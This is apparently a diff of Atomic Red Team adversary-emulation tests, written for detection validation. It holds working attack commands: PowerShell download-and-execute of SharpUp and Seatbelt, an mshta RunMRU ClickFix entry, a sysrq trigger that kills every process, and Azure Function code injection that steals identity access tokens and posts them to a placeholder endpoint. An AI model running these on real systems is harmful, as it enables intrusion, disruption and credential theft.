+      $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
      Invoke-SharpUp -command "audit"
    name: powershell
@@ -288,6 +297,7 @@ atomic_tests:
  - windows
  executor:
    command: |-
+      $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
      Invoke-Seatbelt -Command "-group=all"
    name: powershell
@@ -26,6 +26,8 @@ Some files and directories may require elevated or specific user permissions to

 - [Atomic Test #7 - ESXi - Enumerate VMDKs available on an ESXi Host](#atomic-test-7---esxi---enumerate-vmdks-available-on-an-esxi-host)

+- [Atomic Test #8 - Identifying Network Shares - Linux](#atomic-test-8---identifying-network-shares---linux)
+

 <br/>

@@ -344,4 +346,33 @@ Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -O



+<br/>
+<br/>
+
+## Atomic Test #8 - Identifying Network Shares - Linux
+If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 361fe49d-0c19-46ec-a483-ccb92d38e88e
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+findmnt -t nfs
+```
+
+
+
+
+
+
 <br/>
@@ -191,3 +191,14 @@ atomic_tests:
       echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
    name: command_prompt
    elevation_required: false
+- name: Identifying Network Shares - Linux
+  auto_generated_guid: 361fe49d-0c19-46ec-a483-ccb92d38e88e
+  description: |
+    If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+    Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      findmnt -t nfs
+    name: sh
@@ -20,7 +20,8 @@ Malware or scripts may be used to interact with the devices through an available
 <br/>

 ## Atomic Test #1 - using device audio capture commandlet
-[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
+Uses AudioDeviceCmdlets to set the default recording device and simulate audio capture.
+Module repo: [AudioDeviceCmdlets](https://github.com/frgnca/AudioDeviceCmdlets)

 **Supported Platforms:** Windows

@@ -36,12 +37,26 @@ Malware or scripts may be used to interact with the devices through an available


 ```powershell
-powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
+$mic = Get-AudioDevice -Recording
+Set-AudioDevice -ID $mic.ID
+Start-Sleep -Seconds 5
 ```




+#### Dependencies:  Run with `powershell`!
+##### Description: AudioDeviceCmdlets module must be installed
+##### Check Prereq Commands:
+```powershell
+if (Get-Module -ListAvailable -Name AudioDeviceCmdlets) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Install with: Install-Module -Name AudioDeviceCmdlets -Force"
+```
+
+


 <br/>
@@ -4,12 +4,21 @@ atomic_tests:
 - name: using device audio capture commandlet
  auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95
  description: |
-    [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
+    Uses AudioDeviceCmdlets to set the default recording device and simulate audio capture.
+    Module repo: [AudioDeviceCmdlets](https://github.com/frgnca/AudioDeviceCmdlets)
  supported_platforms:
  - windows
+  dependencies:
+    - description: AudioDeviceCmdlets module must be installed
+      prereq_command: |
+        if (Get-Module -ListAvailable -Name AudioDeviceCmdlets) { exit 0 } else { exit 1 } 
+      get_prereq_command: |
+        Install with: Install-Module -Name AudioDeviceCmdlets -Force" 
  executor:
    command: |
-      powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
+      $mic = Get-AudioDevice -Recording
+      Set-AudioDevice -ID $mic.ID
+      Start-Sleep -Seconds 5
    name: powershell

 - name: Registry artefact when application use microphone
@@ -32,6 +32,8 @@ Sometimes a user's action may be required to open it for deobfuscation or decryp

 - [Atomic Test #10 - XOR decoding and command execution using Python](#atomic-test-10---xor-decoding-and-command-execution-using-python)

+- [Atomic Test #11 - Expand CAB with expand.exe](#atomic-test-11---expand-cab-with-expandexe)
+

 <br/>

@@ -498,4 +500,50 @@ echo "Install Python3"



+<br/>
+<br/>
+
+## Atomic Test #11 - Expand CAB with expand.exe
+Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives.
+Upon success, art-expand-source.txt is extracted next to the CAB.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cab_path | Path to the CAB to expand (created if missing) | path | %TEMP%&#92;art-expand-test.cab|
+| output_dir | Destination directory | path | %TEMP%&#92;art-expand-out|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+mkdir "#{output_dir}" >nul 2>&1
+echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
+makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
+pushd "#{output_dir}"
+expand "#{cab_path}" -F:* .
+popd
+```
+
+#### Cleanup Commands:
+```cmd
+del "PathToAtomicsFolder\T1140\src\art-expand-source.txt" >nul 2>&1
+del "#{cab_path}" >nul 2>&1
+rmdir "#{output_dir}" /s /q >nul 2>&1
+```
+
+
+
+
+
 <br/>
@@ -300,5 +300,35 @@ atomic_tests:
    cleanup_command: 
    name: bash
    elevation_required: false
+- name: Expand CAB with expand.exe
+  auto_generated_guid: 9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11
+  description: |
+    Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives.
+    Upon success, art-expand-source.txt is extracted next to the CAB.
+  supported_platforms:
+  - windows
+  input_arguments:
+    cab_path:
+      description: Path to the CAB to expand (created if missing)
+      type: path
+      default: '%TEMP%\art-expand-test.cab'
+    output_dir:
+      description: Destination directory
+      type: path
+      default: '%TEMP%\art-expand-out'
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      mkdir "#{output_dir}" >nul 2>&1
+      echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
+      makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
+      pushd "#{output_dir}"
+      expand "#{cab_path}" -F:* .
+      popd
+    cleanup_command: |
+      del "PathToAtomicsFolder\T1140\src\art-expand-source.txt" >nul 2>&1
+      del "#{cab_path}" >nul 2>&1
+      rmdir "#{output_dir}" /s /q >nul 2>&1
      

@@ -34,6 +34,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently

 - [Atomic Test #11 - Mirror Blast Emulation](#atomic-test-11---mirror-blast-emulation)

+- [Atomic Test #12 - ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell](#atomic-test-12---clickfix-campaign---abuse-runmru-to-launch-mshta-via-powershell)
+

 <br/>

@@ -671,4 +673,39 @@ reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings"



+<br/>
+<br/>
+
+## Atomic Test #12 - ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
+Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
+This technique relies on user interaction (Win+R + Enter) to trigger execution.
+Used in social engineering campaigns that aim to bypass traditional startup methods.
+Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3f3120f0-7e50-4be2-88ae-54c61230cb9f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>
@@ -423,3 +423,18 @@ atomic_tests:
      & '.\Excel 2016.lnk' "PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm"
    cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f
    name: powershell
+- name: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
+  auto_generated_guid: 3f3120f0-7e50-4be2-88ae-54c61230cb9f
+  description: |
+    Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
+    This technique relies on user interaction (Win+R + Enter) to trigger execution.
+    Used in social engineering campaigns that aim to bypass traditional startup methods.
+    Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
+  supported_platforms:
+    - windows
+  executor:
+    command: |-
+      Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
+    cleanup_command: |-
+      Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -ErrorAction SilentlyContinue
+    name: powershell
@@ -24,6 +24,8 @@ Adversaries may accomplish this by disabling individual services of high importa

 - [Atomic Test #7 - Linux - Stop service by killing process using pkill](#atomic-test-7---linux---stop-service-by-killing-process-using-pkill)

+- [Atomic Test #8 - Abuse of linux magic system request key for Send a SIGTERM to all processes](#atomic-test-8---abuse-of-linux-magic-system-request-key-for-send-a-sigterm-to-all-processes)
+

 <br/>

@@ -299,4 +301,32 @@ sudo systemctl start #{service_name} 2> /dev/null



+<br/>
+<br/>
+
+## Atomic Test #8 - Abuse of linux magic system request key for Send a SIGTERM to all processes
+Adversaries with root or sufficient privileges Send a SIGTERM to all processes, except for init. By writing 'e' to /proc/sysrq-trigger, they can forced kill all processes, except for init.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+echo "e" > /proc/sysrq-trigger
+```
+
+
+
+
+
+
 <br/>
@@ -153,3 +153,14 @@ atomic_tests:
      sudo systemctl start #{service_name} 2> /dev/null
    name: sh
    elevation_required: true
+- name: Abuse of linux magic system request key for Send a SIGTERM to all processes
+  auto_generated_guid: 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+  description: |
+    Adversaries with root or sufficient privileges Send a SIGTERM to all processes, except for init. By writing 'e' to /proc/sysrq-trigger, they can forced kill all processes, except for init.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      echo "e" > /proc/sysrq-trigger
+    name: bash
+    elevation_required: true
@@ -14,6 +14,8 @@ An adversary may deface systems internal to an organization in an attempt to int

 - [Atomic Test #3 - ESXi - Change Welcome Message on Direct Console User Interface (DCUI)](#atomic-test-3---esxi---change-welcome-message-on-direct-console-user-interface-dcui)

+- [Atomic Test #4 - Windows - Display a simulated ransom note via Notepad (non-destructive)](#atomic-test-4---windows---display-a-simulated-ransom-note-via-notepad-non-destructive)
+

 <br/>

@@ -207,4 +209,98 @@ Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -O



+<br/>
+<br/>
+
+## Atomic Test #4 - Windows - Display a simulated ransom note via Notepad (non-destructive)
+Creates a temporary ransom-note text file and opens it in Notepad to
+simulate ransomware "note display" behavior without making destructive
+changes. SAFE and non-destructive.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| note_filename | File name for the simulated ransom note | string | ART-T1491-ransom-note.txt|
+| pid_filename | File name for storing Notepad PID | string | ART-T1491-notepad.pid|
+| note_title | Title at the top of the ransom note | string | !!! READ_ME_NOW !!!|
+| note_body | The body of the ransom note (plain text) | string | Your files are SAFE. This is a TEST note for detection validation
+by bak3n3k0. No data has been encrypted. This simulation exercises
+detections for:
+  - notepad.exe launched with a ransom-themed text file
+  - creation of a ransom-themed text file in %TEMP%
+NON-DESTRUCTIVE Atomic Red Team test.|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$notePath = Join-Path $env:TEMP "#{note_filename}"
+$pidPath  = Join-Path $env:TEMP "#{pid_filename}"
+
+$Title = "#{note_title}"
+$Body  = "#{note_body}"
+
+$header  = $Title + "`r`n" + ('=' * $Title.Length) + "`r`n`r`n"
+$content = $header + $Body
+
+[System.IO.File]::WriteAllText($notePath, $content, [System.Text.Encoding]::UTF8)
+
+$p = Start-Process notepad.exe -ArgumentList "`"$notePath`"" -PassThru
+$p.Id | Out-File -FilePath $pidPath -Encoding ascii -Force
+```
+
+#### Cleanup Commands:
+```powershell
+try {
+  # 1. Kill all Notepad processes
+  Get-Process notepad -ErrorAction SilentlyContinue |
+    ForEach-Object {
+      Stop-Process -Id $_.Id -Force -ErrorAction SilentlyContinue
+    }
+
+  # 2. Wait briefly for Windows to release file handles
+  Start-Sleep -Seconds 1
+
+  # 3. Force delete ransom note + PID file
+  $notePath = Join-Path $env:TEMP "ART-T1491-ransom-note.txt"
+  $pidPath  = Join-Path $env:TEMP "ART-T1491-notepad.pid"
+
+  if (Test-Path $notePath) {
+    Remove-Item $notePath -Force -ErrorAction Stop
+  }
+  if (Test-Path $pidPath) {
+    Remove-Item $pidPath -Force -ErrorAction Stop
+  }
+}
+catch {
+  Write-Warning "Cleanup failed with error: $_"
+}
+```
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: Notepad must be present on the system
+##### Check Prereq Commands:
+```cmd
+where notepad
+```
+##### Get Prereq Commands:
+```cmd
+
+```
+
+
+
+
 <br/>
@@ -153,3 +153,82 @@ atomic_tests:
    name: command_prompt
    elevation_required: false

+- name: Windows - Display a simulated ransom note via Notepad (non-destructive)
+  auto_generated_guid: 0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5
+  description: |
+    Creates a temporary ransom-note text file and opens it in Notepad to
+    simulate ransomware "note display" behavior without making destructive
+    changes. SAFE and non-destructive.
+  supported_platforms:
+    - windows
+  input_arguments:
+    note_filename:
+      description: File name for the simulated ransom note
+      type: string
+      default: "ART-T1491-ransom-note.txt"
+    pid_filename:
+      description: File name for storing Notepad PID
+      type: string
+      default: "ART-T1491-notepad.pid"
+    note_title:
+      description: Title at the top of the ransom note
+      type: string
+      default: "!!! READ_ME_NOW !!!"
+    note_body:
+      description: The body of the ransom note (plain text)
+      type: string
+      default: |
+        Your files are SAFE. This is a TEST note for detection validation
+        by bak3n3k0. No data has been encrypted. This simulation exercises
+        detections for:
+          - notepad.exe launched with a ransom-themed text file
+          - creation of a ransom-themed text file in %TEMP%
+        NON-DESTRUCTIVE Atomic Red Team test.
+  dependency_executor_name: command_prompt
+  dependencies:
+    - description: Notepad must be present on the system
+      prereq_command: "where notepad"
+      get_prereq_command: ""
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $notePath = Join-Path $env:TEMP "#{note_filename}"
+      $pidPath  = Join-Path $env:TEMP "#{pid_filename}"
+
+      $Title = "#{note_title}"
+      $Body  = "#{note_body}"
+
+      $header  = $Title + "`r`n" + ('=' * $Title.Length) + "`r`n`r`n"
+      $content = $header + $Body
+
+      [System.IO.File]::WriteAllText($notePath, $content, [System.Text.Encoding]::UTF8)
+
+      $p = Start-Process notepad.exe -ArgumentList "`"$notePath`"" -PassThru
+      $p.Id | Out-File -FilePath $pidPath -Encoding ascii -Force
+    cleanup_command: |
+      try {
+        # 1. Kill all Notepad processes
+        Get-Process notepad -ErrorAction SilentlyContinue |
+          ForEach-Object {
+            Stop-Process -Id $_.Id -Force -ErrorAction SilentlyContinue
+          }
+
+        # 2. Wait briefly for Windows to release file handles
+        Start-Sleep -Seconds 1
+
+        # 3. Force delete ransom note + PID file
+        $notePath = Join-Path $env:TEMP "ART-T1491-ransom-note.txt"
+        $pidPath  = Join-Path $env:TEMP "ART-T1491-notepad.pid"
+
+        if (Test-Path $notePath) {
+          Remove-Item $notePath -Force -ErrorAction Stop
+        }
+        if (Test-Path $pidPath) {
+          Remove-Item $pidPath -Force -ErrorAction Stop
+        }
+      }
+      catch {
+        Write-Warning "Cleanup failed with error: $_"
+      }
+
@@ -22,19 +22,33 @@ Application access tokens may function within a limited lifetime, limiting how l

 ## Atomic Tests

- [Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst](#atomic-test-1---azure---dump-all-azure-key-vaults-with-microburst)
+- [Atomic Test #1 - Azure - Functions code upload - Functions code injection via Blob upload](#atomic-test-1---azure---functions-code-upload---functions-code-injection-via-blob-upload)
+
+- [Atomic Test #2 - Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token](#atomic-test-2---azure---functions-code-upload---functions-code-injection-via-file-share-modification-to-retrieve-the-functions-identity-access-token)


 <br/>

-## Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst
-Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
-See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+## Atomic Test #1 - Azure - Functions code upload - Functions code injection via Blob upload
+This test injects code into an Azure Function (RCE).
+
+Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
+
+Similar to T1528 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token", the depicted code injection scenario tampers the source code of Azure Functions to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance. In this case, the prepared zip file (underlying package for a Function) is expected to contain the tampered function presented in src/code_to_insert.py. Note that the endpoint https://changeme.net needs to be adapted in your packed function code.
+
+Note:
+- The Azure Function modified in this test must be hosted via Azure Blob storage (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations). 
+- For Function code upload to Azure Functions that are hosted via Azure Files in a File Share, refer to T1528 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token".
+- The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
+
+Requirements:
+- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
+- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.

 **Supported Platforms:** Iaas:azure


-**auto_generated_guid:** 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
+**auto_generated_guid:** 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43



@@ -43,59 +57,216 @@ See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginner
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| username | Azure AD username | string | |
-| password | Azure AD password | string | T1082Az|
-| output_file | File to dump results to | string | $env:temp&#92;T1528Test1.txt|
-| subscription_id | Azure subscription id to search | string | |
+| storage_account_name | Name of storage account that is related to the Function | string | storage_account_name_example|
+| container_name | Name of the container that contains the function blob | string | container_name_example|
+| blob_name | Name of the function blob | string | blob_example|
+| file_path_blob | Path to the function code file to upload as blob | path | $env:temp/T1528_function_code.zip|


-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `powershell`! 


 ```powershell
-import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
-Connect-AzureRmAccount -Credential $Credential
-Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
-cat #{output_file}
+az login    # Log in to Azure CLI
+
+$allowSharedKeyAccess = az storage account show --name "#{storage_account_name}" --query "allowSharedKeyAccess"
+
+if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
+    Write-Output "Shared key access is disabled for this storage account."
+} else {    
+    $connectionString = az storage account show-connection-string --name "#{storage_account_name}" --query connectionString --output tsv
+
+    # Download blob for cleanup
+    $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + "#{blob_name}")
+    az storage blob download --connection-string $connectionString --container-name "#{container_name}" --name "#{blob_name}" --file $tmpOriginalFunctionCode --overwrite true
+
+    if ($LASTEXITCODE -eq 0) {
+        # Upload new blob version if download of existing blob succeeded
+        az storage blob upload --connection-string $connectionString --container-name "#{container_name}" --name "#{blob_name}" --file "#{file_path_blob}" --overwrite true
+    } else {
+        Write-Output "Download original function code failed."
+        exit 1
+    }
+}
 ```

 #### Cleanup Commands:
 ```powershell
-remove-item #{output_file} -force -erroraction silentlycontinue
+az login    # Log in to Azure CLI
+
+# Upload previous funciton code
+$tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + "#{blob_name}")
+az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
+
+if ($LASTEXITCODE -eq 0) {
+    Write-Output "Uploaded original version of function code."
+
+    # Delete tmp original blob file if upload succeeded
+    Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+    Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
+} else {
+    Write-Output "Upload original function code failed."
+}
 ```



 #### Dependencies:  Run with `powershell`!
-##### Description: The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
+##### Description: Azure CLI must be installed
 ##### Check Prereq Commands:
 ```powershell
-if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit 0} else {exit 1}
+try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-```
-##### Description: The Azure RM module must be installed.
-##### Check Prereq Commands:
-```powershell
-try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Install-Module -Name AzureRM -Force -allowclobber
-```
-##### Description: The Azure module must be installed.
-##### Check Prereq Commands:
-```powershell
-try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Install-Module -Name Azure -Force -allowclobber
+Install-Module -Name Az -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token
+This test injects code into an Azure Function (RCE) to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance.
+
+Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
+
+Once executed, the "https://changeme" will retrieve the access token when the function app is executed on behalf of the tenant. The function may be triggered manually from authorized people, triggered in regular intervals, or in various other ways. The access token can then be used to perform further attack steps with the permissions that the function app holds (e.g. listening virtual machines).
+
+Note: 
+- The Azure Function modified in this test must be hosted via Azure Files in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
+- For Function code upload to Azure Functions that are hosted via Azure Blob storage, refer to T1528 "Azure - Functions code upload - Functions code injection via Blob upload".
+- The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
+- Important: Change the https://changeme.net in code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted e.g. as request bin via Pipedream to display the body of incoming POST requests.
+- The default injected code to retrieve the access token can be replaced by arbitrary other code. In this case: Replace the code defined in code_to_insert_path
+
+Requirements:
+- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
+- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
+
+Execution options: Defined by the input field execution_option
+- insert_code: This option (1) downloads the existing funciton code into a tmp file, (2) injects the code from code_to_insert_path at the beginning of the file, and (3) uploads the tampered file to the targeted Azure Function code (Azure File Share File).
+- replace_file: This option uploads the function code defined in code_to_insert_path to the targeted Azure Function code (Azure File Share File).
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| storage_account_name | Name of storage account that is related to the Function | string | storage_account_name_example|
+| execution_option | Chooses execution option insert_code, or replace_file | string | insert_code|
+| file_share_name | Name of the file share that is related to the Function | string | file_share_name_example|
+| file_path | Path to the Function file in the file share | path | site/wwwroot/function_app.py|
+| code_to_insert_path | The code that will be injected into the Function | path | $PathToAtomicsFolder/T1528/src/code_to_insert.py|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+az login    # Log in to Azure CLI
+
+$allowSharedKeyAccess = az storage account show --name "#{storage_account_name}" --query "allowSharedKeyAccess"
+
+if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
+    Write-Output "Shared key access is disabled for this storage account."
+} else {
+    # Download file for cleanup
+    $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
+    $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + $tmpOriginalFileName)
+    az storage file download --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --only-show-errors --dest $tmpOriginalFunctionCode
+
+    if ($LASTEXITCODE -eq 0) {
+        # Upload new funciton code if download of existing code succeeded
+        if ("#{execution_option}" -eq "insert_code") {
+            # Download file from file share for injection
+            $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
+            az storage file download --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --only-show-errors --dest $tmpFunctionCode
+            
+            if ($LASTEXITCODE -ne 0) {
+                Write-Output "Function code download failed."
+                exit 1
+            }
+            Write-Output "File downloaded: $($tmpFunctionCode)"
+            
+            $insertContent = Get-Content -Path "#{code_to_insert_path}" -Raw  # Load the content of the insert file
+            
+            $content = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file
+            $content = $insertContent + "`n" + $content     # Insert the new code at the beginning
+            $content | Set-Content -Path $tmpFunctionCode       # Write the modified content to the file
+            
+            # Upload file to file share
+            az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpFunctionCode --only-show-errors
+            if ($LASTEXITCODE -ne 0) {
+                Write-Output "Function code upload failed."
+                exit 1
+            }
+            Write-Output "Uploaded the tampered file"
+        } elseif ("#{execution_option}" -eq "replace_file") {
+            az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source "#{code_to_insert_path}" --only-show-errors
+            if ($LASTEXITCODE -ne 0) {
+                Write-Output "Function code upload failed."
+                exit 1
+            }
+            Write-Output "Uploaded the tampered file"
+        } else {
+            Write-Output "Please choose a valid execution_option"
+            exit 1
+        }
+    } else {
+        Write-Output "Download original function code failed."
+        exit 1
+    }
+}
+```
+
+#### Cleanup Commands:
+```powershell
+az login    # Log in to Azure CLI
+
+# Upload previous funciton code
+$tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
+$tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + $tmpOriginalFileName)
+az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
+
+if ($LASTEXITCODE -eq 0) {
+    Write-Output "Uploaded original version of function code."
+
+    # Delete tmp original f file if upload succeeded
+    if ("#{execution_option}" -eq "insert_code") {
+        $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
+        Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
+        Write-Output "Deleted tmp file: $($tmpFunctionCode)"
+    }
+
+    # Delete tmp original file
+    Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+    Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
+} else {
+    Write-Output "Upload original function code failed."
+}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Azure CLI must be installed
+##### Check Prereq Commands:
+```powershell
